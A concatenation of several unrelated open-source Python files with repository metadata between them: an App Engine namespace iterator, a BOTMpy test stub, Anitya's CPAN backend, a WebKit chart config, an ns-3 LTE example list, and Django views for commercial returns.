if i == len(ns_ranges) - 1:
namespace_end = MAX_NAMESPACE
else:
namespace_end = _ord_to_namespace(
_namespace_to_ord(ns_ranges[i+1].namespace_start) - 1)
continuous_ns_ranges.append(NamespaceRange(namespace_start,
namespace_end,
_app=_app))
return continuous_ns_ranges
else:
return ns_ranges
def __iter__(self):
"""Iterate over all the namespaces within this range."""
cursor = None
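    # Page through the namespace keys NAMESPACE_BATCH_SIZE at a time, resuming
    # from the query cursor until a short batch signals the end.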
while True:
query = self.make_datastore_query(cursor=cursor)
count = 0
for ns_key in query.Run(limit=NAMESPACE_BATCH_SIZE):
count += 1
yield ns_key.name() or ''
if count < NAMESPACE_BATCH_SIZE:
break
cursor = query.GetCursor()
def get_namespace_keys(app, limit):
"""Get namespace keys."""
ns_query = datastore.Query('__namespace__', keys_only=True, _app=app)
return list(ns_query.Run(limit=limit, batch_size=limit))
|
apache-2.0
|
pmeier82/BOTMpy
|
botmpy/test/test_nodes_artifacts.py
|
1
|
3553
|
# -*- coding: utf-8 -*-
#_____________________________________________________________________________
#
# Copyright (c) 2012 Berlin Institute of Technology
# All rights reserved.
#
# Developed by: Neural Information Processing Group (NI)
# School for Electrical Engineering and Computer Science
# Berlin Institute of Technology
# MAR 5-6, Marchstr. 23, 10587 Berlin, Germany
# http://www.ni.tu-berlin.de/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal with the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimers.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimers in the documentation
# and/or other materials provided with the distribution.
# * Neither the names of Neural Information Processing Group (NI), Berlin
# Institute of Technology, nor the names of its contributors may be used to
# endorse or promote products derived from this Software without specific
# prior written permission.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# WITH THE SOFTWARE.
#_____________________________________________________________________________
#
# Acknowledgements:
# Philipp Meier <[email protected]>
#_____________________________________________________________________________
#
##---IMPORTS
try:
import unittest2 as ut
except ImportError:
import unittest as ut
from numpy.testing import assert_equal, assert_almost_equal
import scipy as sp
from botmpy.nodes import ArtifactDetectorNode
##---TESTS
class TestArtifactDetectorNode(ut.TestCase):
def setUp(self):
pass
def testArtifactDetector(self):
pass
"""
from os import listdir, path as osp
from spikeplot import mcdata, plt
from botmpy.common import XpdFile
from botmpy.nodes import SDMteoNode as SDET
tf = 65
AD = ArtifactDetectorNode()
SD = SDET(tf=tf, min_dist=int(tf * 0.5))
XPDPATH = '/home/phil/Data/Munk/Louis/L011'
for fname in sorted(filter(lambda x:x.startswith('L011') and
x.endswith('.xpd'),
listdir(XPDPATH)))[:20]:
arc = XpdFile(osp.join(XPDPATH, fname))
data = arc.get_data(item=7)
AD(data)
print AD.events
print AD.get_nonartefact_epochs()
print AD.get_fragmentation()
SD(data)
f = mcdata(data=data, other=SD.energy, events={0:SD.events},
epochs=AD.events, show=False)
for t in SD.threshold:
f.axes[-1].axhline(t)
plt.show()
"""
if __name__ == '__main__':
ut.main()
|
mit
|
release-monitoring/anitya
|
anitya/lib/backends/cpan.py
|
1
|
3710
|
# -*- coding: utf-8 -*-
"""
(c) 2014-2016 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <[email protected]>
Ralph Bean <[email protected]>
"""
import logging
from defusedxml import ElementTree as ET
from anitya.lib.backends import BaseBackend, get_versions_by_regex, REGEX
from anitya.lib.exceptions import AnityaPluginException
_log = logging.getLogger(__name__)
class CpanBackend(BaseBackend):
""" The custom class for projects hosted on CPAN.
    This backend allows one to specify a version_url and a regex that will
be used to retrieve the version information.
"""
name = "CPAN (perl)"
examples = [
"https://metacpan.org/release/Net-Whois-Raw/",
"https://metacpan.org/release/SOAP/",
]
@classmethod
def get_version(cls, project):
""" Method called to retrieve the latest version of the projects
provided, project that relies on the backend of this plugin.
:arg Project project: a :class:`anitya.db.models.Project` object whose backend
corresponds to the current plugin.
:return: the latest version found upstream
:return type: str
:raise AnityaPluginException: a
:class:`anitya.lib.exceptions.AnityaPluginException` exception
when the version cannot be retrieved correctly
"""
return cls.get_ordered_versions(project)[-1]
@classmethod
def get_version_url(cls, project):
""" Method called to retrieve the url used to check for new version
of the project provided, project that relies on the backend of this plugin.
Attributes:
project (:obj:`anitya.db.models.Project`): Project object whose backend
corresponds to the current plugin.
Returns:
str: url used for version checking
"""
url = "https://metacpan.org/release/%(name)s/" % {"name": project.name}
return url
@classmethod
def get_versions(cls, project):
""" Method called to retrieve all the versions (that can be found)
of the projects provided, project that relies on the backend of
this plugin.
:arg Project project: a :class:`anitya.db.models.Project` object whose backend
corresponds to the current plugin.
:return: a list of all the possible releases found
:return type: list
:raise AnityaPluginException: a
:class:`anitya.lib.exceptions.AnityaPluginException` exception
when the versions cannot be retrieved correctly
"""
url = cls.get_version_url(project)
regex = REGEX % {"name": project.name}
return get_versions_by_regex(url, regex, project)
@classmethod
def check_feed(cls):
""" Return a generator over the latest uploads to CPAN
by querying an RSS feed.
"""
url = "https://metacpan.org/feed/recent"
try:
response = cls.call_url(url)
except Exception: # pragma: no cover
raise AnityaPluginException("Could not contact %s" % url)
try:
root = ET.fromstring(response.text)
except ET.ParseError:
raise AnityaPluginException("No XML returned by %s" % url)
for item in root.iter(tag="{http://purl.org/rss/1.0/}item"):
title = item.find("{http://purl.org/rss/1.0/}title")
try:
name, version = title.text.rsplit("-", 1)
except ValueError:
_log.info("Unable to parse CPAN package %s into a name and version")
homepage = "https://metacpan.org/release/%s/" % name
yield name, homepage, cls.name, version
|
gpl-2.0
|
saisai/phantomjs
|
src/qt/qtwebkit/Tools/QueueStatusServer/config/charts.py
|
122
|
2458
|
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
patch_log_limit = 500
# All units are represented numerically as seconds.
one_minute = 60.0
one_hour = one_minute * 60.0
one_day = one_hour * 24.0
one_month = one_day * 30.0
# How far back to view the history, specified in seconds.
view_range_choices = [
{"name": "1 day", "view_range": one_day},
{"name": "1 week", "view_range": one_day * 7},
{"name": "1 month", "view_range": one_month},
]
default_view_range = one_day
_time_units = [
    # (threshold, time unit, name)
(0, one_hour, "hours"),
(4 * one_day, one_day, "days"),
(3 * one_month, one_month, "months"),
]
def get_time_unit(view_range):
current_threshold, current_time_unit, current_name = _time_units[0]
for threshold, time_unit, name in _time_units[1:]:
if view_range >= threshold:
current_time_unit, current_name = time_unit, name
else:
break
return current_time_unit, current_name
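# Illustrative examples (not part of the original file), using the constants
# above: get_time_unit(2 * one_day) returns (one_hour, "hours"),
# get_time_unit(7 * one_day) returns (one_day, "days") and
# get_time_unit(4 * one_month) returns (one_month, "months").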
|
bsd-3-clause
|
dumbringer/ns-3-dev-ndnSIM
|
src/lte/test/examples-to-run.py
|
151
|
3664
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
## -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-
# A list of C++ examples to run in order to ensure that they remain
# buildable and runnable over time. Each tuple in the list contains
#
# (example_name, do_run, do_valgrind_run).
#
# See test.py for more information.
cpp_examples = [
("lena-cqi-threshold", "True", "True"),
("lena-dual-stripe", "True", "True"),
("lena-dual-stripe --simTime=0.0 --nApartmentsX=1 --homeEnbDeploymentRatio=0.5 --nMacroEnbSites=0 --macroUeDensity=0 --nBlocks=1", "True", "True"),
("lena-dual-stripe --epc=1 --simTime=0.0 --nApartmentsX=1 --homeEnbDeploymentRatio=0.5 --nMacroEnbSites=0 --macroUeDensity=0 --nBlocks=1", "True", "True"),
("lena-dual-stripe --simTime=0.01", "True", "True"),
("lena-dual-stripe --epc=1 --simTime=0.01", "True", "True"),
("lena-dual-stripe --epc=1 --useUdp=0 --simTime=0.01", "True", "True"),
("lena-dual-stripe --epc=1 --fadingTrace=../../src/lte/model/fading-traces/fading_trace_EPA_3kmph.fad --simTime=0.01", "True", "True"),
("lena-dual-stripe --nBlocks=1 --nMacroEnbSites=0 --macroUeDensity=0 --homeEnbDeploymentRatio=1 --homeEnbActivationRatio=1 --homeUesHomeEnbRatio=2 --macroEnbTxPowerDbm=0 --simTime=0.01", "True", "True"),
("lena-dual-stripe --nMacroEnbSites=0 --macroUeDensity=0 --nBlocks=1 --nApartmentsX=4 --nMacroEnbSitesX=0 --homeEnbDeploymentRatio=1 --homeEnbActivationRatio=1 --macroEnbTxPowerDbm=0 --epcDl=1 --epcUl=0 --epc=1 --numBearersPerUe=4 --homeUesHomeEnbRatio=15 --simTime=0.01", "True", "True"),
("lena-fading", "True", "True"),
("lena-gtpu-tunnel", "True", "True"),
("lena-intercell-interference --simTime=0.1", "True", "True"),
("lena-pathloss-traces", "True", "True"),
("lena-profiling", "True", "True"),
("lena-profiling --simTime=0.1 --nUe=2 --nEnb=5 --nFloors=0", "True", "True"),
("lena-profiling --simTime=0.1 --nUe=3 --nEnb=6 --nFloors=1", "True", "True"),
("lena-rlc-traces", "True", "True"),
("lena-rem", "True", "True"),
("lena-rem-sector-antenna", "True", "True"),
("lena-simple", "True", "True"),
("lena-simple-epc", "True", "True"),
("lena-x2-handover", "True", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TtaFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TdTbfqFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TdMtFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::TdBetFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::RrFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::PssFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::PfFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::FdTbfqFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::FdMtFfMacScheduler", "options.valgrind", "True"),
("lena-simple-epc --simTime=1.1 --ns3::LteHelper::Scheduler=ns3::FdBetFfMacScheduler", "options.valgrind", "True"),
]
# A list of Python examples to run in order to ensure that they remain
# runnable over time. Each tuple in the list contains
#
# (example_name, do_run).
#
# See test.py for more information.
python_examples = []
|
gpl-2.0
|
sztosz/neonet
|
CommercialReturns/views.py
|
1
|
4999
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Created on 2013-10-11
#
# @author: Bartosz Nowak [email protected]
#
# This file is licensed GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007
from __future__ import unicode_literals
import unicodecsv
from django.contrib.auth import logout
from django.shortcuts import redirect
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponse
from django.views.generic import DetailView, UpdateView, ListView, DeleteView, RedirectView
from neonet.views import LoggedInMixin
import models
import forms
class CommercialReturns(LoggedInMixin, ListView):
queryset = models.CommercialReturn.objects.order_by('-start_date')
template_name = 'CommercialReturns/list.html'
class CommercialReturnDetail(LoggedInMixin, DetailView):
model = models.CommercialReturn
template_name = 'CommercialReturns/detail.html'
context_object_name = 'commercial_return'
def get_context_data(self, **kwargs):
context = super(CommercialReturnDetail, self).get_context_data(**kwargs)
context['commodities'] = models.CommodityInCommercialReturn.objects.filter(commercial_return=self.object.pk)
return context
class CommercialReturnExport(CommercialReturnDetail):
def get(self, request, *args, **kwargs):
self.object = self.get_object()
context = self.get_context_data(object=self.object)
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="commercial_return.csv.txt"'
writer = unicodecsv.writer(response, delimiter=b';')
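        # The rows below are written in Polish, the application's UI language:
        # return number, carrier, driver name, car registration plates,
        # carrier comment, duration (start - end), controller, then the item
        # columns (quantity, commodity, ean, waybill, document).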
try:
writer.writerow(['Numer: {}'.format(context['commercial_return'].return_number())])
writer.writerow(['Przewoźnik: {}'.format(context['commercial_return'].carrier.name)])
writer.writerow(['Nazwisko kierowcy: {}'.format(context['commercial_return'].driver_name)])
writer.writerow(['Nr rejestracyjny samochodu: {}'.format(context['commercial_return'].car_plates)])
writer.writerow(['Komentarz do przewoźnika: {}'.format(context['commercial_return'].carrier_comment)])
writer.writerow(['Czas trwania: {} - {}'.format(context['commercial_return'].start_date,
context['commercial_return'].end_date)])
writer.writerow(['Kontroler: {} {}'.format(context['commercial_return'].user.first_name,
context['commercial_return'].user.last_name)])
writer.writerow([''])
writer.writerow(['Ilość', 'Towar', 'ean', 'List przewozowy', 'Dokument'])
for row in context['commodities']:
writer.writerow([row.amount, row.commodity, row.commodity.ean, row.waybill, row.document_name()])
except KeyError:
writer.writerow(['Nastąpił błąd parsowania danych: brak towarów w liście'])
return response
class CommercialReturnPrint(CommercialReturnDetail):
template_name = 'CommercialReturns/print.html'
class CommercialReturnUpdate(LoggedInMixin, UpdateView):
model = models.CommercialReturn
template_name = 'CommercialReturns/update.html'
def get_success_url(self):
return reverse('DamageReports:list')
class CommercialReturnClose(LoggedInMixin, RedirectView):
url = reverse_lazy('DamageReports:list')
def get_redirect_url(self, *args, **kwargs):
commercial_return = models.CommercialReturn.objects.get(pk=self.kwargs.get('pk'))
commercial_return.completed = True
commercial_return.save()
return super(CommercialReturnClose, self).get_redirect_url()
class CommercialReturnItemUpdate(LoggedInMixin, UpdateView):
model = models.CommodityInCommercialReturn
template_name = 'CommercialReturns/item_update.html'
form_class = forms.CommercialReturnItem
def get_success_url(self):
return reverse('DamageReports:commercial_return_detail', args=(self.object.commercial_return.pk,))
def get_initial(self):
initial = self.initial.copy()
initial['ean'] = self.get_object().commodity.ean
initial['commercial_return'] = self.get_object().commercial_return.id
return initial
def form_valid(self, form):
commercial_return = models.CommercialReturn.objects.get(pk=form.cleaned_data['commercial_return'])
item = form.save(commit=False)
item.commercial_return = commercial_return
item.save()
return super(CommercialReturnItemUpdate, self).form_valid(form)
class CommercialReturnItemDelete(LoggedInMixin, DeleteView):
model = models.CommodityInCommercialReturn
template_name = 'CommercialReturns/item_delete.html'
def get_success_url(self):
return reverse('DamageReports:detail', args=(self.object.commercial_return.pk,))
def logout_view(request):
logout(request)
return redirect('DamageReports:charts')
|
gpl-3.0
|